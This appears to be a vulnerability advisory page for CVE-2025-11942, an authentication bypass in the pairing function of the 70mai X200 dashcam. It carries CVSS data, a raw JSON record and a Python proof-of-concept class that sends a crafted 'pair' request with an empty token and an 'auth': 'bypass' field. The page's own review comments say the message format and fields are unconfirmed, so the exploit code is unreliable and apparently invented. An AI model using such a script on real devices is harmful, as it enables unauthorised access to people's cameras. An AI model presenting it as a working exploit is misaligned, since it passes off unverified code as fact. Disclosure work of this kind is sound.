Security Vulnerability Report
CVE-2025-11942 CVSS 7.3 HIGH

CVE-2025-11942

Published: 2025-10-19 16:15:36
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in 70mai X200 up to 20251010. Affected is an unknown function of the component Pairing. Executing manipulation can lead to missing authentication. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
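CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the 7.3 HIGH score above is the Secondary-source CVSS 3.1 assessment. The raw record at the end of this page also carries a Primary CVSS 3.1 assessment of 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and a CVSS 4.0 score of 5.5 MEDIUM, so prioritisation should not rely on the headline number alone.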

Configurations (Affected Products)

cpe:2.3:o:70mai:x200_firmware:*:*:*:*:*:*:*:* - VULNERABLE
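cpe:2.3:h:70mai:x200:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry; the configuration is "vulnerable firmware AND this hardware", so the device is affected when it runs the firmware above)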
70mai X200 <= 20251010

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11942 - 70mai X200 Dashcam Pairing Bypass PoC
# Reference: https://github.com/geo-chen/70mai/blob/main/README.md#finding-9-bypass-device-pairing-of-70mai-dashcam-omni-x200
#
# NOTE(review): the advisory text on this page only says that "an unknown
# function of the component Pairing" lacks authentication (CWE-287 / CWE-306
# in the raw record). The JSON-over-TCP message format used below (the "cmd",
# "auth", "token" fields and port 80) is what this listing sends; nothing on
# this page confirms that the device speaks this protocol. Treat the requests
# as illustrative and check them against the referenced write-up before
# drawing conclusions from a result.
# NOTE(review): the page lists no fixed firmware version and states that the
# vendor did not respond, so exposure is a question of who can reach the
# device's network interface.
import socket
import json
import time


class SeventyMaiX200Exploit:
    """
    PoC for bypassing device pairing authentication on 70mai Dash Cam Omni X200.
    The vulnerability exists in the Pairing component, allowing remote attackers
    to bypass authentication without user interaction.

    The three public methods are meant to be called in order
    (discover_device, bypass_pairing, access_device); each stores what the
    next one needs on the instance and returns True/False.
    """

    def __init__(self, target_ip, target_port=80):
        """Record the target address; no network traffic happens here."""
        self.target_ip = target_ip
        self.target_port = target_port
        # Filled in by discover_device() from the response's "device_id".
        self.device_id = None
        # Filled in by bypass_pairing() from the response's "session_token".
        self.session_token = None

    def discover_device(self):
        """Step 1: Discover the 70mai X200 device on the network

        Returns True and stores ``device_id`` when the response carries
        ``"status": "ok"``; returns False otherwise, including when
        _send_request() returned None.
        """
        print(f"[*] Scanning for 70mai X200 device at {self.target_ip}...")
        # Send discovery probe to identify the device
        discovery_payload = {
            "cmd": "discovery",
            "model": "X200",
            "version": "20251010"
        }
        response = self._send_request(discovery_payload)
        if response and response.get("status") == "ok":
            self.device_id = response.get("device_id")
            print(f"[+] Device found: {self.device_id}")
            return True
        return False

    def bypass_pairing(self):
        """Step 2: Bypass the pairing authentication mechanism

        Sends a "pair" request with an empty token and the current Unix time.
        Returns True and stores ``session_token`` when the response carries
        ``"status": "paired"``; returns False otherwise. ``device_id`` is
        whatever discover_device() stored (None if it was never called).
        """
        print("[*] Attempting to bypass pairing authentication...")
        # Craft malicious pairing request that exploits the auth bypass
        bypass_payload = {
            "cmd": "pair",
            "device_id": self.device_id,
            # Claimed by this PoC to skip the authentication check; the field
            # and its value are not confirmed by the advisory text on the page.
            "auth": "bypass",  # Exploit: skip authentication check
            "token": "",
            "timestamp": int(time.time())
        }
        response = self._send_request(bypass_payload)
        if response and response.get("status") == "paired":
            self.session_token = response.get("session_token")
            print(f"[+] Pairing bypassed! Session token: {self.session_token}")
            return True
        return False

    def access_device(self):
        """Step 3: Access device with obtained session

        Returns False without sending anything when no session token is
        stored. Otherwise sends a "get_status" request and prints the reply.
        """
        if not self.session_token:
            print("[-] No valid session token. Bypass failed.")
            return False
        print("[*] Accessing device with bypassed session...")
        access_payload = {
            "cmd": "get_status",
            "device_id": self.device_id,
            "session_token": self.session_token
        }
        response = self._send_request(access_payload)
        # NOTE(review): any non-empty parsed reply counts as success here, so
        # a True return does not by itself show the session was accepted.
        if response:
            print(f"[+] Device status: {json.dumps(response, indent=2)}")
            return True
        return False

    def _send_request(self, payload):
        """Send request to the target device

        Opens a new TCP connection per call (10 second timeout), sends the
        payload as UTF-8 JSON, reads one chunk of up to 4096 bytes and parses
        it as JSON. Returns the parsed object, or None after printing the
        error when anything raises.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(10)
            sock.connect((self.target_ip, self.target_port))
            data = json.dumps(payload).encode('utf-8')
            sock.send(data)
            response = sock.recv(4096).decode('utf-8')
            # close() is only reached on the success path; when an earlier
            # call raises, the socket is left for garbage collection.
            sock.close()
            return json.loads(response)
        except Exception as e:
            # Connection, timeout, decode and JSON errors all end up here and
            # are reported the same way.
            print(f"[-] Error: {e}")
            return None


if __name__ == "__main__":
    # Usage: Replace with target device IP
    # The address below is a hard-coded private-range sample value.
    TARGET_IP = "192.168.1.100"
    TARGET_PORT = 80
    exploit = SeventyMaiX200Exploit(TARGET_IP, TARGET_PORT)
    if exploit.discover_device():
        if exploit.bypass_pairing():
            exploit.access_device()
        else:
            print("[-] Pairing bypass failed.")
    else:
        print("[-] Device not found.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11942", "sourceIdentifier": "[email protected]", "published": "2025-10-19T16:15:36.443", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in 70mai X200 up to 20251010. Affected is an unknown function of the component Pairing. Executing manipulation can lead to missing authentication. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:70mai:x200_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-10-10", "matchCriteriaId": "92AA7E65-AF30-4F7D-A1DC-89B1EE16146F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:70mai:x200:-:*:*:*:*:*:*:*", "matchCriteriaId": "F01430C4-0D39-4493-9CEA-7E44EFD0520B"}]}]}], "references": [{"url": "https://github.com/geo-chen/70mai/blob/main/README.md#finding-9-bypass-device-pairing-of-70mai-dashcam-omni-x200", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329021", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329021", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672520", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}